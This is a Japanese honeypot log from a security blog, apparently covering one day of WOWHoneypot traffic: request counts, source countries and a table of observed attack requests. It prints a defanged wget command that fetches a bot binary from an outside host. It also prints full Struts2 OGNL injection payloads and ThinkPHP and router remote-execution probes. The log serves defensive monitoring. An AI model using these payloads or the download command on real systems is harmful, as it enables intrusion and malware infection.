23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(179日目)

2019/09/11(水)

トータルは383件でした。

ハンティングログは以下です。

211.193.211[.]96 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com

IPのロケーション別の件数は以下です。

イタリア 319
韓国 19
アメリ 11
中国 5
ブラジル 5
イラン 4
オランダ 2
エクアドル 2
インド 2
トルコ 1
イギリス 1
チェコ 1
シンガポール 1
アルバニア 1
インドネシア 1
アルゼンチン 1
パキスタン 1
南アフリカ 1
ペルー 1
ギリシャ 1
ロシア 1
ウクライナ 1
フランス 1

f:id:sec23:20190913165711p:plain

件数 概要 リクエス
318 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
37 アクセス GET /
7 Struts脆弱性を狙った通信 POST /login.action
7 Struts脆弱性を狙った通信 POST /index.action
2 phpMyAdminの調査 GET /admin-scripts.asp
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 Struts2脆弱性を狙った通信? POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a*1.(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/login.action
1 Struts2脆弱性を狙った通信? POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a*2.(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
1 Netgear ルータの調査 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
1 D-Linkルータの調査 GET /login.cgi
1 Strutsの調査 GET /login.action
1 Strutsの調査 GET /index.action
1 GET /Temporary_Listen_Addresses/SMSSERVICE

*1:%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class

*2:%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class